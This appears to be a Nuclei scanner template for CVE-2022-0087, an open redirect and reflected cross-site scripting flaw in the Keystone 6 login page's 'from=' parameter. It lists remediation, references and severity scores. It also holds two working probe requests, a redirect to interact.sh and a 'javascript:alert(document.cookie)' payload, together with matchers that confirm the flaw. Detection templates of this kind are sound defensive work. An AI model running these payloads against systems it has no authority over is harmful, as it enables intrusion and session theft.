id: CVE-2022-0087 info: name: Keystone 6 Login Page - Open Redirect and Cross-Site Scripting author: ShivanshKhari severity: medium description: | On the login page, there is a "from=" parameter in URL which is vulnerable to open redirect and can be escalated to reflected XSS. remediation: | Please upgrade to @keystone-6/auth >= 1.0.2, where this vulnerability has been closed. If you are using @keystone-next/auth, we strongly recommend you upgrade to @keystone-6 reference: - https://huntr.com/bounties/c9d7374f-2cb9-4bac-9c90-a965942f413e - https://nvd.nist.gov/vuln/detail/CVE-2022-0087 - https://github.com/keystonejs/keystone/commit/96bf833a23b1a0a5d365cf394467a943cc481b38 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-0087 cwe-id: CWE-79 epss-score: 0.001 epss-percentile: 0.40139 cpe: cpe:2.3:a:keystonejs:keystone:*:*:*:*:*:node.js:*:* metadata: max-request: 2 vendor: keystonejs product: keystone framework: node.js tags: cve,cve2022,keystone,redirect,xss,node.js,keystonejs http: - method: GET path: - "{{BaseURL}}/signin?from=https://interact.sh" - "{{BaseURL}}/signin?from=javascript:alert(document.cookie)" matchers-condition: and matchers: - type: word part: header words: - "Location: https://interact.sh" - type: word part: body words: - "alert(document.cookie)" # digest: 4b0a00483046022100e593d1ea8f11a2fda9ec11684b2de65075fb4cbc4d35af4986961bff299afd37022100b11d0e7dc901eda32e6a5b1f2958f5976f72bd1dd3cb87d7dbc29c05b8031a3c:922c64590222798bb761d5b6d8e72950